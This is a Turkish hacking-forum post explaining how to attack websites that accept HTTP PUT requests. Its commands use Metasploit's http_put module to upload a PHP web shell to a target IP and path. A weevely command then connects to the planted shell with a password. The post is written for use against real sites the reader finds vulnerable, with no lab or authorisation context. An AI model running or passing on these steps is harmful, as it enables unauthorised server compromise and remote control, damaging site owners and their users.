PUT Exploit saldırısı

Eğer put exploit açığı bulduğunuz bir site varsa göstereceğim adımları uygulayın. Msfconsol programını açın.. msf > use auxiliary/scanner/http/http_put msf > set rhosts...

Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
Eğer put exploit açığı bulduğunuz bir site varsa göstereceğim adımları uygulayın.

Msfconsol programını açın..

msf > use auxiliary/scanner/http/http_put
msf > set rhosts "HEDEF SİTENİN İP ADRESİ" /ÖRNEK : set rhosts 192.168.45.31
msf > set path "AÇIĞIN OLDUĞU YER" / ÖRNEK : set path /get/
msf > set filename "SHELL DOSYASI" / ÖRNEK : set filename makassar.php
msf > set filedata file://root/Desktop/shell2.php / Siz eğer parrot vs kullanıyorsanız (cd desktop yazın ve sonra pwd yazın /User/root/Desktop/shell2.php)
msf > exploit

İŞLEM OLDUKTAN SONRA : ~# weevely http://hedefsite.com/path/makassar.php "ŞİFRE" / ÖRNEK : weevely http://hedefsite.com/path/makassar.php 12345

Ve işlem tamamlanmıştır.
 
💬 SpyHackerz Telegram — Anlık tartışmalar ve duyurular için katıl
  • Like
Tepkiler: WyX
Durum
Üzgünüz bu konu cevaplar için kapatılmıştır...
133,402Konular
3,281,998Mesajlar
318,990Kullanıcılar
ColdBlooDeaDSon Üye
Üst Alt